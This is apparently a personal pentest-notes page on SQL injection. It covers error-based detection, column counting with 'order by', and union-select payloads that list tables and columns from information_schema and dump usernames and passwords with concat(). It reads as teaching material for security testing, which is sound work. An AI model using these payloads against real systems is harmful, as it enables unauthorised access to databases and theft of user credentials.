# SQLI

Occurs when user input is inputted into the SQL query string without properly sanitizing or filtering the input.

[Here is a nice SQLi cheat sheet ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)

If you find a vulnerable endpoint it’s probably best to use a tool like [SQLmap](https://github.com/sqlmapproject/sqlmap)

#### Popular Databases

* MySQL, MSSQL, PostgreSQL, Oracle.

### SQLi testing

If you ever see that error you know there is SQL injection:

<figure><img src="https://1674729424-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyzdFWSUijzVYOP1hAsit%2Fuploads%2F6vaNMob1N8uOw0righzR%2Fimage.png?alt=media&#x26;token=ebc8910c-89cd-4837-8605-cb24d05e17f4" alt=""><figcaption><p>MySQL error indicating SQL injection</p></figcaption></figure>

<figure><img src="https://1674729424-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyzdFWSUijzVYOP1hAsit%2Fuploads%2FDm9numYadRQz5em6qat2%2Fimage.png?alt=media&#x26;token=69ba440b-5450-4793-b4f5-54896232dc2b" alt=""><figcaption><p>PostgreSQL SQL error</p></figcaption></figure>

Inject a query that sorts the results by a column we specified like column 1, or column 2 until we get an error saying (the column specified does not exist):

* using ' order by\<Number here>--
* for example, if we failed at order by 3, this means the table has 2 columns

#### List of tables in the database

Use union select to list tables in the database:

payload: ' union select NULL, table\_name from information\_schema.tables--

<figure><img src="https://1674729424-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyzdFWSUijzVYOP1hAsit%2Fuploads%2FgfsNhDITfBTqCiMF37Dc%2Fimage.png?alt=media&#x26;token=f916ad23-0a1d-474c-9559-9499a3aaa611" alt=""><figcaption></figcaption></figure>

#### List of columns in the users' table

payload: ' union select NULL, column\_name from information\_schema.columns where table\_name = '\<Table Name Here>'--

<figure><img src="https://1674729424-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyzdFWSUijzVYOP1hAsit%2Fuploads%2FyABwz5zsd9MWInxUUk9w%2Fimage.png?alt=media&#x26;token=2bdafab4-792a-4820-b65e-73e5ab8d9a61" alt=""><figcaption></figcaption></figure>

#### Dumping usernames and passwords of users

use the “concat()” function To return the password and username in the same column.

payload: ' union select NULL, concat(\<Column Name>,':',\<Column Name 2>) from \<Table Name>--

<figure><img src="https://1674729424-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyzdFWSUijzVYOP1hAsit%2Fuploads%2FrrIFaidNBqpEm3mN1m4y%2Fimage.png?alt=media&#x26;token=eade7220-3721-4e24-b7a4-7183e2ec44cc" alt=""><figcaption></figcaption></figure>